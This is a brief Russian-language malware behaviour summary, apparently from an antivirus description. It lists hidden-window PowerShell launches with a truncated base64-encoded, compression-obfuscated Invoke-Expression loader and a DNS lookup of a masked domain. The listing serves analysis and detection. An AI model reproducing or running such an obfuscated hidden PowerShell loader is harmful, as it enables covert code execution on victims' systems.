Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBuAHYATwBrAGUALQBFAHgAUAByAEUAcwBTAEkAbwBuACAAKABuAGUAVwAtAE8AQgBKAGUAQwBUACAAcwBZAHMAVABlAG0ALgBJAE8ALgBjAG8AbQBwAHIARQBTAHMASQBPAG4ALgBEAEUARgBMAGEAdABFAHMAdAByAGUAQQBtACgAIABbAEkATwAuAE...
- DNS ASK km###dhwe.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e SQBuAHYATwBrAGUALQBFAHgAUAByAEUAcwBTAEkAbwBuACAAKABuAGUAVwAtAE8AQgBKAGUAQwBUACAAcwBZAHMAVABlAG0ALgBJAE8ALgBjAG8AbQBwAHIARQBTAHMASQBPAG4ALgBEAEUARgBMAGEAdABFAHMAdAByAGUAQQBtACgAIABbAEkATwAuAE...' (со скрытым окном)